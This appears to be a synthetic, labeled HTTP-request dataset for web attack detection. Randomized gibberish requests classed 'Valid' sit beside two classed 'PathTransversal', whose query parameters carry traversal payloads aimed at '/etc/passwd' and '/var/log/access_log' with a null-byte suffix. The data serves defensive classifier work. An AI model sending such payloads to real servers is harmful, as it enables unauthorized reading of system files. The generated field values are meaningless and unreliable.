Host: www.nddn7A0r.ch:80
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: x-mac-hebrew, ks_c_5601-1987
Accept-Encoding: 
Accept-Language: mvimci-2eisIw, Efte-ett, tig-aehuioa8;q=0.6
Cache-Control: min-fresh=04
Client-ip: 94.217.250.252
Cookie: ad=sNf49InHUaaB
Cookie2: $Version="266"
Date: Wed, 02 Apr 08 19:52:33 CET
ETag: W/"0G_KBsgPyDnxx8Lf"
Expect: 100-continue
From: gyture4e@b1eUnPsa.de
If-Modified-Since: Fri, 16 Jul 04 16:51:12 CET
If-Unmodified-Since: Fri, 08 Jun 07 11:17:02 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 22 Sep 07 06:30:33 GMT
Max-Forwards: 660
MIME-Version: 1.1
Pragma: eLb=ielcei
Proxy-Authorization: Basic cm9kMGhuMjpvYUl5enZvaA==
Authorization: NTLM cm5ldW90Z3MyZGRrbHFvZVJubDl5MWE4UnNockVlZnl6ZXVMYXVlNG9nZWRlaDY=
Range: 7-3572
Referer: http://www.iqtulHhg.ch/trrd/7yeen.php4
TE: trailers,trailers
Trailer: Cache-Control
User-Agent: Mozilla/1.8 (compatible; MSIE 9.7; Windows NT; bttAt6I1ng)
UA-CPU: 68000
UA-Disp: 7865,493,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 3660x726
Via: 8.6 253.75.182.4, 6.8 87.34.21.94
Transfer-Encoding: fteonn; o9tee=roTNnf
Upgrade: D54Tc/5.2
Warning: 831 www.ibia3otE.html "oosrinefTwhigssstnI" "Tue, 26 Jan 10 08:02:32 CET"
X-Forwarded-For: 219.111.245.62
X-Serial-Number: 010709448680546
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8919
Start - Id: 22481
class: Valid
GET /2dqj/y9dhu49H/nmpncIp0e07bycefhna/damjkaeL0In6sn.dll?group by@varVKk_O1I=a6%40onusv+9croz&d7nudPnerennxnt=893307&hrmemhidez=881&fetiHgreyp=2042594644&dc=naritt0lbt&3.6to=96435&hS6VXx0qtye=2o&ahvso7aaeitrnau=7&detniTetas4=iii&Oie=19&cwqppe=iiiOnEe&6hwarsls=woto7aNUve9doi&eekwmeanelr=n4q.zBMvb HTTP/1.1
Host: 172.172.57.176
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: compress, deflate
Accept-Language: ho-e0c;q=0.0
Cache-Control: ya5sn=ng9odIv
Client-ip: 228.144.43.94
Cookie: Ksoaonce0ejedt=hsigSshrihYoinputM;sRuesSnUheTi=Iiemun:Edexoab;innhtoei=iLeNy3e 5twsY
Cookie2: $Version="99"
Date: Tue, 18 Jan 05 07:28:21 CET
ETag: W/"W.yk0@rYrsjtVDROqvT"
Expect: 100-continue
From: oh5chbe@53nslitm.fr
If-Modified-Since: Fri, 18 May 07 03:41:51 GMT
If-Unmodified-Since: Sat, 21 Jul 07 04:39:51 GMT
If-Match: "IU2fwNhS_mcb87R@1"
If-None-Match: "x-Vbfe9ze7eLRm27rBd"
If-Range: "inhIim0IscooL5Obk"
Max-Forwards: 225
MIME-Version: 0.3
Pragma: iM8e='hNnma0n'
Proxy-Authorization: NTLM ZU5SdHQ2cmxtZHRERWVFZWViYXI1QUluYVAxSmhvZW1JMGd0
Authorization: Digest uri=/1exwi/r3Gfstt/oahehO/twpq.msf
Range: 6012-6390
Referer: http://eisi.st/dvuzze/ose4Ed/aslao.bin
TE: trailers
Trailer: Upgrade
User-Agent: drt41tie/5.5.1
UA-CPU: 68000
UA-Disp: 392,629,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 060x3759
Via: HTTP/9.1 160.179.68.12, tgz8g3/4.3 207.110.53.121, 1.8 www.mtoaanah.js
Transfer-Encoding: deflate
Upgrade: bah/4.7, 7rv/7.5
Warning: 929 www.tgeoabe.tiff "tnGttae2" 
X-Forwarded-For: 10.200.53.236
X-Serial-Number: 5826747890581
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22481
Start - Id: 22032
class: Valid
GET /tetcF6PcndocumentLx9-/6imvy7qYx2ALh/eOP3wo86EKL1N/iDho1adfcnhXhremt3sW/olNMBUnL/UtNc3/nrigiu.jpg?eerhbica6=ZL&linkwMswautoexeco-y5Pg=966624189&tFtoD=ltaEpq&aTilS7to=521483&Nefi=ePkD6DG&F81=650&5oriTfe=sw.EwduB-&O8u0tdsneOjiri=EP%40e8aeDcipno&SazW0lfOP=1&MqPz=a1tine2&rleoV=Tte1wget&niwclo3e=ko%3Bcn+5mRhenoaiefwfrom HTTP/1.0
Host: 96.12.161.82
Connection: keep-alive
Accept: audio/*;q=0.9, image/*;q=0.4
Accept-Charset: *;q=0.9
Accept-Encoding: compress, deflate, compress;q=0.3, compress
Accept-Language: *;q=0.2
Cache-Control: max-stale
Client-ip: 254.122.123.9
Cookie: ya8tolbwe9iA=228989;t9Xsbp=c5ctneiEsShfgxhj;4oRreoir=tmeeqowieawhe0Mh;Qnull-I435hwp-Mf=925383399
Cookie2: $Version="46"
Date: Thu, 20 Oct 05 16:19:48 GMT
ETag: "OjbW9x0lMmWzDJ2U"
Expect: 100-continue
From: rnoHSnss@agsartc.de
If-Modified-Since: Mon, 19 Dec 05 16:45:44 UTC
If-Unmodified-Since: Mon, 17 Nov 08 08:02:29 UTC
If-Match: *
If-None-Match: "mLgGtNnxlgXrz4midU-"
If-Range: *
Max-Forwards: 1
MIME-Version: 1.6
Pragma: fun='tdsc'
Proxy-Authorization: NTLM Um9zRndCZXRPaXl1MEU0c3RFY2xlcmRlM3JlZmdybnI=
Authorization: iEad 2aUnen=treorwde
Range: 5-448267
Referer: /cbbhle.sh
TE: trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/0.4 (X11; U; Linux i586 7.3; al-dh; rv:9.5.5) Gecko/26989991
UA-CPU: StrongARM
UA-Disp: 077,354,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 7963x8460
Via: HTTP/4.0 www.lIifhbM.html
Transfer-Encoding: deflate
Upgrade: p9tI/9.2, 8r9o/6.5, aeyn/9.3
Warning: 103 www.Krm9fhll.htm "rrsU3rWt9etr" 
X-Forwarded-For: 154.57.178.151
X-Serial-Number: 10148622161169
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22032
Start - Id: 16901
class: Valid
GET /ZehnStt/Oax5roservicesf/EnWqnmdsTri4tdztatoi/dBXOKHSqRWSKAvI-H/h@QAlWza5F9Sqd3-A3/o3mDFglB1JU-Lw.png?MQlogp=%5D9%3DsOji6i7tetc+%3Fnt&7kgs=usol%3CLlttvm&c73sO=updateE9+%2B+fromoe%22su4o%22boot.ini++r&rnnebif=passwdwtreapd&oninNo=sj2&fhejorawnroc=auh&6RqNGAf1ZChY=6667836&NRL.eV6wSk_W=nhs&cbyh=249105415&watyocwrs=%26oI%28m HTTP/1.1
Host: 78.167.35.214:7439
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-1;q=0.3, iso-8859-15;q=0.4
Accept-Encoding: 
Accept-Language: mOaWrmre-tRecy, dm1a-ro3d;q=0.9, Trirt-s9jaf, mi8aegya-strmYni
Cache-Control: only-if-cached
Client-ip: 254.25.138.231
Cookie: lyynLSydittai=@0;tdOsih=nnetcatet;jrhbYsoeeitgstm=543;6tuaaielnssdoit=04440578;aftiioNp2occe=7848
Cookie2: $Version="10"
Date: Thu, 13 Jan 05 14:25:21 GMT
ETag: "jmQGa4xHf2Ya1mG"
Expect: 100-continue
From: riThlet@hsidtis.uk
If-Modified-Since: Thu, 11 Jun 09 08:20:08 UTC
If-Unmodified-Since: Thu, 30 Mar 06 02:38:23 CET
If-Match: "Pu-nTLAMr83EUCOAj"
If-None-Match: *
If-Range: "7pv_Hs.VhOJp9lEGUn"
Max-Forwards: 1015
MIME-Version: 5.7
Pragma: dvuaze=a2snre
Proxy-Authorization: Basic MnNzckdkazppYWVhd3JsNQ==
Authorization: NTLM dExKZXN1MGlpb2J0YW15YXQyc2V0dXNhdGR4dGVhZWFvY3U=
Range: 7-79328,283181-,-126600
Referer: /f7ei/urcldla/Drfogne.mdb
TE: chunked;q=0.5,gzip,trailers
Trailer: Referer
User-Agent: dnn5ts9/2.2.6.8.7
UA-CPU: StrongARM
UA-Disp: 077,285,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 124x8989
Via: 8.6 www.sjyeftoi.html, baz0ou/5.7 102.248.112.218
Transfer-Encoding: identity
Upgrade: osu/3.4, lZote/5.0, bbZap/2.0, oA2/8.9
Warning: 961 www.El3ett.jpg "wosiueayliee1e9dNy8d" 
X-Forwarded-For: 144.164.88.102
X-Serial-Number: 81135810517
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16901
Start - Id: 46326
class: PathTransversal
GET /nbiwee2pplP0S9ea/olevgWrT/aC6p_/nh2pe/KCAgwgetdivFZ@QCm.htm?feeo=84906575&iCJQAZnOkdeleted=572&nuClsT=42&ch4ispn=eectA1nintheco&eedsNh=%27hefbsadivz+aw&CfffEhds=474771&Lp3B6JcS=eothitdeg&JBsock_streamTu=%24%7Ea&XeNR=wsff&iegtsa=..%2F..%2F..%2F..%2Fvar%2Flog%2Faccess_log%2500.html&N.Dh5=t%3B%3Co HTTP/1.1
Host: 55.229.70.251
Connection: close
Accept: */*;q=0.6
Accept-Charset: iso-8859-4;q=0.4, euc-tw
Accept-Encoding: deflate;q=0.1, identity, gzip;q=0.1
Accept-Language: epc-ctm, titvs-fdpro;q=0.2, daftFhI-renieinn;q=0.6
Cache-Control: min-fresh=632
Client-ip: 146.96.8.202
Cookie: ehpul4tsmemmnnd= ;ieone3e0=Rny;nsno1lifiof=0981921
Cookie2: $Version="67"
Date: Wed, 12 Sep 07 22:16:43 CET
ETag: "A4n@WphrfP3Od4@lx"
Expect: 100-continue
From: sgtDwB@5isge.ch
If-Modified-Since: Sat, 30 Apr 05 17:27:34 GMT
If-Unmodified-Since: Tue, 24 Feb 09 14:54:38 GMT
If-Match: "1swgFq-Ny_tsuC94bX"
If-None-Match: *
If-Range: "slnPTwfk7G9XoLL7KF0S"
Max-Forwards: 3641
MIME-Version: 6.3
Pragma: idnoier='4fo2ls'
Proxy-Authorization: Digest nc=54AeEe7f
Authorization: Basic bW5oaTpTaDU5ZzRn
Range: 595-7160,98-,4-961
Referer: /spoWnr2s/entlim.html
TE: trailers,deflate;q=0.9,trailers
Trailer: Via
User-Agent: Mozilla/7.4 (compatible; Konqueror/5.6; Unix; ti1h; 8hfrai0tw; yeorhv)
UA-CPU: Sparc
UA-Disp: 0890,6289,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 434x579
Via: HTTP/2.3 www.edoar.png, FTP/3.6 www.i6e0s.css, HTTP/3.0 37.143.67.171
Transfer-Encoding: compress
Upgrade: Dnh/3.3, iienNa/1.0, khpjt/2.7, ote6v4/0.0
Warning: 494 178.239.117.244 "Abhgtrgfsota" "Tue, 21 Mar 06 06:42:46 CET"
X-Forwarded-For: 84.224.165.18
X-Serial-Number: 5744439401
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46326
Start - Id: 24053
class: Valid
GET /hsfneicnuiaq8ectr/Ctil/ia8nh/dtsesaStOfeio/Zy/a8b/e4mCrt5eoae7t/Nsay7rueE/yMB6S4Xi-_FgTD5l.zZ.aspx?hAKGXJRLDJ0=4sXv2YwEA&oesde=fqBABhF&npiS=n+&frRr=3547&Daccept0i9bWetwIf=htpasseinsertH+iehadpzeruee HTTP/1.0
Host: 180.40.63.97
Connection: close
Accept: */*
Accept-Charset: euc-tw, koi8;q=0.3, hz-gb-2312;q=0.6, iso-2022-kr;q=0.2, iso-8859-1;q=0.9
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.1
Cache-Control: el=dodhorI
Client-ip: 88.212.87.151
Cookie: nUtBaRrotlcKov=teaftp;whm4no2Llmasosh=qie;h1ytopXe11e=zlMwrc
Cookie2: $Version="342"
Date: Fri, 25 Jul 08 01:42:11 GMT
ETag: W/"wEVZw1PbzYmAZZFS"
Expect: 100-continue
From: fewUg9v0@yntowDa.org
If-Modified-Since: Sun, 30 Mar 08 22:31:10 CET
If-Unmodified-Since: Wed, 06 Aug 08 18:43:03 CET
If-Match: "PAhwi6AovXgOx@51c2L"
If-None-Match: *
If-Range: *
Max-Forwards: 0884
MIME-Version: 6.0
Pragma: d='taEarh'
Proxy-Authorization: 5pue neoh0ai=ade4maHi
Authorization: NTLM ZTRwOGFwZXV1ZWRnZXdhYXZvdzJpc1VnNmc4RXRldHQ=
Range: 537-243504,313-,96328-45
Referer: http://erhtcA.be/erlr9/feujeo/9gfpe7/mnhhmLC.pdf
TE: deflate
Trailer: Range
User-Agent: Mozilla/0.1 (X11; U; SunOS sun4u 9.0; hn-TH; rv:8.9.6) Gecko/80408357
UA-CPU: x86
UA-Disp: 176,3441,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 775x0014
Via: ienaa/3.2 www.sdadyfze.shtml, 6.6 www.ueqpae.htm
Transfer-Encoding: identity
Upgrade: nmewTt/7.6, leE8lt/7.1, Iamoc/9.3, oal/9.5
Warning: 652 250.250.27.45 "ucdaI7dsmtc" 
X-Forwarded-For: 240.187.200.43
X-Serial-Number: 4272941
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24053
Start - Id: 23272
class: Valid
GET /j6cAesQs/wOfx3aPOOQ/f2f/kA3@dyLxGUYxn_ZM1WP/y6HtKzMb18xxGdF/QSjPFPexecP5@QF-LZ/rCWLqfhU@rem2CtW6P.swf?ztdNaleb5psE=1052806&Ircm=qai&qtozwao=nixtermmn+dbso+t3ismc%25 HTTP/1.0
Host: 151.191.161.51
Connection: iryITk0
Accept: */*
Accept-Charset: x-mac-arabic, iso-8859-4;q=0.2, windows-1257, iso-8859-4, iso-8859-6
Accept-Encoding: 
Accept-Language: a-nsded, LAscho-ane;q=0.8
Cache-Control: min-fresh=62876
Client-ip: 181.44.84.160
Cookie: uTixwgetB-ls-G=aeoafTlA0niotsoi
Cookie2: $Version="74"
Date: Sat, 07 Jan 06 03:28:52 UTC
ETag: "2@ut8TgWDk520dACYX5"
Expect: 100-continue
From: seuezp8x@tfEa7ie.uk
If-Modified-Since: Wed, 06 May 09 22:30:12 GMT
If-Unmodified-Since: Thu, 02 Aug 07 02:40:55 CET
If-Match: *
If-None-Match: *
If-Range: "mxPweLDoNSgE399Vo-Bw"
Max-Forwards: 6542
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Digest cnonce="5tlS"
Authorization: NTLM MHBhbkcwZG5lNW9hbWF0b25yYXRiaW1ydm9jaTJkY3Nmc3Z0cnN1bmV0ZmU1ZDF6
Range: 46049-,984-,955-52588
Referer: http://www.tusvicn.it/iouoL8a6/Paecg/raoI.html
TE: chunked,chunked,chunked;q=0.7
Trailer: User-Agent
User-Agent: Mozilla/5.2 (Windows; U; WinNT 7.2; Se-rv; rv:2.3.5) Gecko/19163291
UA-CPU: MIPS
UA-Disp: 5075,682,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 030x0444
Via: 5.6 www.Vhrdh.htm
Transfer-Encoding: deflate
Upgrade: etro5e/7.7, dH1i/3.8, rit/1.6
Warning: 836 www.snfril2o.jpg "cdqtacTsrnfqdneEeRe" "Sat, 16 Dec 06 14:24:55 UTC"
X-Forwarded-For: 55.67.110.255
X-Serial-Number: 736748310370
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23272
Start - Id: 5648
class: Valid
PUT /deapGtRhoeotYelRy/8sl9oatjjeanc8rss9/CtmpG9Lz1q/ghxGuvuk6E-p4H/A6AbinQ.inputPkc/r5PjrAYauOkUIclT/JsEl/no3tfNrn.jpg? HTTP/1.1
Content-Length: 282
Content-Language: 5w,k,6sen
Content-Encoding: compress
Content-Location: /eam5n/regh/batyAye/rohatxti.nsf
Content-MD5: aWUxb1RkcmVubHJ0YWRodQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 11 Jan 07 18:12:49 CET
Last-Modified: Tue, 15 Jul 08 02:08:46 CET
Host: www.heasBot2ws.com:80
Connection: keep-alive
Accept: application/*;q=0.4, text/plain;q=0.8, video/quicktime
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: iwf5e-lp, acnfrR-9heji;q=0.7, orsArOai-dp;q=0.6
Cache-Control: no-transform
Client-ip: 112.147.183.171
Cookie: OdxqF=LOtak;peeT=93193;e4mH1oEtwrgctAp=482495;yj=rdapuj;seos=9uaggssa
Cookie2: $Version="3"
Date: Sat, 11 Jun 05 15:54:47 GMT
ETag: "n6bLDU8wc3kp@PX0Ml"
Expect: 100-continue
From: ncfnnd3s@pjasfsran.gov
If-Modified-Since: Sun, 22 Nov 09 15:39:36 GMT
If-Unmodified-Since: Sun, 01 Jul 07 16:54:25 UTC
If-Match: "YHIh5JkkqZR.SLdV_"
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: NTLM YTNiNG85bHJpc2VlZ0FtMDlBcnNsbld6dW9sZXRobmg5bA==
Authorization: Basic dGtyZHlkOjlmcGxz
Range: 54-,73-799
Referer: http://rlph.biz/sis6ca/strIjC.mdb
TE: trailers,gzip
Trailer: Expect
User-Agent: i2tdedyeot1soitt
UA-CPU: PowerPC
UA-Disp: 1912,4963,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 129x5543
Via: HTTP/8.7 180.128.141.218, 1.3 107.196.15.32
Transfer-Encoding: mxarTs
Upgrade: han/8.7, 10s/1.0, cttH8e/9.6, tmdb/9.7, qlteR/5.3
Warning: 299 182.237.115.10 "ehssVhw" 
X-Forwarded-For: 93.141.115.142
X-Serial-Number: 59672
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

zDkKj=17586541&nasntiT=srAeEsepteganha&om=tspunion&maep=PGooeAoaSaq2Edte&XOacceptechoLx3C_LGcmd=8641492&cidMadyrrazea=ED6&8tdeea=2thnSra&cchrso9rm3Kmi6=eU8WAi6ZvrEs&ce8=hmoo1&tl9crezmtw=zstlnhsiW2kl&hdoqvebq=i+bq<&ou8r57rae=61644&oO=it(euntL1ke&tie3A=oyj-yXv&t7o0l=nP3mpEY0@

End - Id: 5648
Start - Id: 11546
class: Valid
GET /zv6kp1C89wA66mu/edOh2pttbnge/roprEls9r/lspeeguro97lfdteftub/iZd55R-NN_1u/x0ntsaa.mspx?a8ountehrjdo6=62858749&eeLuottr9ihs=edS37irasvteas&yhiSol=e1VxzTp&21mneheuIner=986135&like-T4o=12844380&kMvppowbd=at-r%3Dni+&ioerSOaoh=H7L&khRtU=9&de4cnfuHreera=indf%3Btdossst&csoagrnT=ooz7ned%24u%246idlsOdropr&erscariidsi=sx2 HTTP/1.0
Host: www.iict.st
Connection: keep-alive
Accept: image/gif;q=0.2, image/*;q=0.2, text/*
Accept-Charset: iso-2022-jp, x-mac-korean, cp-932
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: max-stale
Client-ip: 101.58.74.98
Cookie: rtjnb=uGiQyuTBwUH
Cookie2: $Version="6"
Date: Thu, 16 Mar 06 23:20:55 UTC
ETag: ".nm9GHqe5y1ddcKnHj"
Expect: 100-continue
From: aTangld@839i.de
If-Modified-Since: Sat, 09 Aug 08 09:04:31 CET
If-Unmodified-Since: Tue, 24 Jan 06 18:09:44 UTC
If-Match: *
If-None-Match: "uJHYYlRa9ab0EpjMs"
If-Range: "FotIECYv8jgAkK9AW.8r"
Max-Forwards: 850
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Basic bmk0YW85ZXo6dXRhamE=
Authorization: NTLM dHVlOHJoQWV3bHJJWmRyaHJyb3VhemRzdGlhOHNhZG4yb2V1
Range: 8-
Referer: http://naueE.org/nnwpor/ansou/65nie7fk/lths/xsa4r.css
TE: trailers,trailers,trailers
Trailer: Referer
User-Agent: Mozilla/7.9 (Windows; U; Win 9x 0.5; nh-ii; rv:3.6.4) Gecko/52872742
UA-CPU: x86
UA-Disp: 2337,296,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 5189x1158
Via: 1.3 102.97.157.64
Transfer-Encoding: compress
Upgrade: doots/6.6
Warning: 881 35.69.28.129 "mesddqopoikepkyer" 
X-Forwarded-For: 175.39.106.169
X-Serial-Number: 24189
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11546
Start - Id: 33630
class: Valid
PUT /eea5otrnslnlben/hahce3a/poeN542wf2gQ8LWxlj/wrN/aDML.js? HTTP/1.1
Content-Length: 106
Content-Language: auA
Content-Encoding: identity
Content-Location: http://www.ae4It.st/Naipmo.doc
Content-MD5: ZWRucm9Jb29udGU5aDZjYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 11 Sep 08 01:39:08 CET
Last-Modified: Sat, 23 Jul 05 05:44:01 CET
Host: www.tapBieorni.it:76457
Connection: close
Accept: application/*, text/*, application/postscript;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: Afnnumti-l1hm9so, si-eE7aa, tnebhzO-i;q=0.8
Cache-Control: no-cache
Client-ip: 21.116.10.218
Cookie: tzer9rtRts2Ar4=x0X;csetsm2hn='perlxmlhttpInkheaT;aoa8=8
Cookie2: $Version="405"
Date: Sat, 21 Feb 09 08:17:07 GMT
ETag: "kmSUcPJ2-I1qWCt"
Expect: 100-continue
From: sorto@ieishbt.net
If-Modified-Since: Sat, 14 May 05 24:58:19 GMT
If-Unmodified-Since: Wed, 02 May 07 09:04:55 CET
If-Match: "Aq98oQDw56Ti3T_"
If-None-Match: *
If-Range: Fri, 23 Jul 04 08:14:31 CET
Max-Forwards: 26
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Basic c242bzp1aHNydHV5
Authorization: NTLM bGMxdGc0aHVvbzd2ZXRTMmFlYXRld2FvZWw0dkxjZW5Jc3Rjc3o1c2Nz
Range: 689688-61042,8281-8,59457-
Referer: /nheroneh/ebaniiib/aauisoa/xhPhEte/3nAayNaa.php3
TE: deflate,trailers
Trailer: If-Match
User-Agent: Mozilla/4.4 (Machintosh; U; Mac OS X 4.4; uA-ye; rv:4.8.5) Gecko/29112154
UA-CPU: PowerPC
UA-Disp: 2341,003,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 468x6101
Via: 8.2 www.y0hredrh.css:4
Transfer-Encoding: compress
Upgrade: eaaid/2.3, 7o3Sh/3.6, zoasn/4.5, oau/0.2
Warning: 498 www.xaotiar.jpg "eukeq6fnna" 
X-Forwarded-For: 246.11.40.158
X-Serial-Number: 0416121042278331
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

G2nOeC=<unioniaz&Ik53cwQjdelete6=+&7serbOdwnnr9ise=ft_jgyd&ELmochaKd=KgwemErrnonDriitu&rtr6gcAfyr=lW-B

End - Id: 33630
Start - Id: 25454
class: Valid
GET /rhD0bb/awROg5G-h5gm0_K5A8z/nr5wdialgbKXpnw/d-KL.png? HTTP/1.0
Host: www.jehtdeo.be
Connection: ekat
Accept: video/quicktime;q=0.3
Accept-Charset: windows-1250, iso-8859-1, x-mac-chinesesimp, cp-950;q=0.0
Accept-Encoding: deflate;q=0.9, gzip;q=0.8
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 25.109.225.253
Cookie: ektpl2hmeqau3=hd4geenrue3ihsre;atparh=mo4;VMXCH=240106;ohi8Pec=;n;hTft5=n5rrrcmd
Cookie2: $Version="2"
Date: Sun, 13 Jun 04 21:29:49 GMT
ETag: W/"IPj4C0f-CmU1B8YcXo"
Expect: yiyatf
From: erech@PrbAn.gov
If-Modified-Since: Thu, 28 Apr 05 08:19:15 GMT
If-Unmodified-Since: Sun, 28 Feb 10 05:41:08 CET
If-Match: "wC@Nd1t10pPdkpy1"
If-None-Match: *
If-Range: Sat, 10 Apr 04 16:43:09 CET
Max-Forwards: 177
MIME-Version: 8.3
Pragma: z=o
Proxy-Authorization: Digest nonce
Authorization: sctAu whssuy=qpgmoe
Range: -7599
Referer: http://i0agDk.be/nis5aEo/Faryx/nepet.php4
TE: trailers
Trailer: Referer
User-Agent: Mozilla/2.1 (Machintosh; U; Mac OS X 7.7; dh-bn; rv:0.6.3) Gecko/02023778
UA-CPU: 68000
UA-Disp: 0760,497,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 475x4200
Via: 3.9 www.ordHzlnN.jpg, xxg/7.9 www.wlOOk.css
Transfer-Encoding: compress
Upgrade: 9s7ea/6.2, demcn/8.6, kutsiy/1.9
Warning: 426 www.nrhesd.shtml "alyndt" 
X-Forwarded-For: 62.171.11.144
X-Serial-Number: 1082193356186
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25454
Start - Id: 46180
class: PathTransversal
GET /iO2Tq6b.swf?oaas=tiG%40d+7%3FTto+&dRxeesuip0Sav=599024&vxc=oSYdWyfij&J5o_n=+fr&91nq5vb=o&wa7Luihon12dtl=064030&nesueRSgl=353702942&httpucmd6ev=%2Fetc%2Fpasswd&i6wipdo=bdeletes HTTP/1.1
Host: 199.122.186.127
Connection: hardjkN
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: sa5sqhl-cftx;q=0.8, tal7a-y
Cache-Control: no-cache
Client-ip: 68.94.47.234
Cookie: lrfhsueeonsecbi=35;pea3esOf=31068;wb@YFossd=1slstdinmnddda;t2aehdl=10729279;4deuFEB=e;ar3
Cookie2: $Version="82"
Date: Wed, 02 Jun 04 07:29:21 GMT
ETag: W/"zHp6z1-Anyy.MLyB2IMg"
Expect: cedee3w=dlwMc;pae5ufla=teioH
From: duvqw@ecyw.st
If-Modified-Since: Thu, 14 Dec 06 06:48:11 GMT
If-Unmodified-Since: Thu, 02 Dec 04 20:45:57 GMT
If-Match: *
If-None-Match: "h@BfGwMRw8PxrRQhut"
If-Range: Mon, 02 Mar 09 02:41:46 CET
Max-Forwards: 788
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: 9esi xlsrt=e623
Authorization: Digest response="a9e5F10D9dffdBcbdAD1c7071a9ff3dA"
Range: -423
Referer: /blaE8ku/iqaWkm/a6Ocitad/afeec/glurn.nsf
TE: gzip,chunked,chunked
Trailer: If-Unmodified-Since
User-Agent: Mozilla/2.0 (Machintosh; U; Mac OS X 0.2; n3-r8; rv:8.4.6) Gecko/42212853
UA-CPU: x86
UA-Disp: 3301,4753,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 939x7286
Via: FTP/0.8 58.123.140.202, 2.9 www.erubl.html
Transfer-Encoding: identity
Upgrade: amiap/9.1
Warning: 292 www.tdsirTm.jpg "oohoctsorndn" "Tue, 29 Dec 09 06:05:50 GMT"
X-Forwarded-For: 249.22.33.20
X-Serial-Number: 726425305540692
----: -------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 46180
Start - Id: 16140
class: Valid
GET /oK/c6WyKz@Y0B2730vvkJho/cbKoKl85nOkK.XxJ9bf1/nG_r@pKMz3QG4/eXMvwue/yVjUIx0/eOkKY12/rIEoe.jpg?nlxud5tica=a%3C3homea&2gqetmno0c6=srbecerlnesues0&satoshena1hhrs=52&vceur=472181&48YzZIeX=evi1ni&ohtte8dgtt=esli%40ftseTkds&tomtnozzipt9O7l=Emegtdb8s&hyodsej=-passthruimu3p&itr2c8=Jg&ticmasaf0tooL=ehtz&ffr9kija6ozetod=880&pkAoIxJJTIG=enn%24kais&nhn=+j1i&Fmulexeqrhi=style&r4ho6cmereahb=Ao%25 HTTP/1.1
Host: 77.236.52.158
Connection: reltnwrd
Accept: text/html, audio/*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 5wrech-ge9Y3Id;q=0.7
Cache-Control: no-store
Client-ip: 17.158.128.83
Cookie: a0=vh;pEzLyulh=i.6G3ETS5;2otterhphl=gxp_@/r
Cookie2: $Version="550"
Date: Sun, 11 Feb 07 05:35:35 CET
ETag: "DmIPd3.5oykWdKWDL6"
Expect: 100-continue
From: nt6y@jrn3wp.st
If-Modified-Since: Thu, 18 Sep 08 22:15:58 UTC
If-Unmodified-Since: Fri, 16 May 08 11:06:02 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 29 Nov 08 01:35:36 CET
Max-Forwards: 045
MIME-Version: 1.5
Pragma: 5tr=ne
Proxy-Authorization: Digest opaque="PcngeE"
Authorization: pdct 2nOvrmp=yanfl
Range: 396-,06-480,6-
Referer: /rrxxeu/aail/ceAtrku/s9eyw/endnoee.pdf
TE: trailers,deflate
Trailer: Pragma
User-Agent: Mozilla/6.2 (Windows; U; Windows NT 9.2; ne-ai; rv:6.0.3) Gecko/23872767
UA-CPU: MIPS
UA-Disp: 235,1889,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 846x8936
Via: pEwklg/4.3 180.7.244.230, FTP/9.8 144.29.80.228
Transfer-Encoding: deflate
Upgrade: 0n1no/3.8, a1ogu/4.2, nz7eem/1.9, srsgz1/5.5, krtea6/0.1
Warning: 819 www.htahn.html "47kuswi" "Thu, 19 May 05 07:26:39 UTC"
X-Forwarded-For: 45.149.45.168
X-Serial-Number: 38500847837
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 16140
Start - Id: 37892
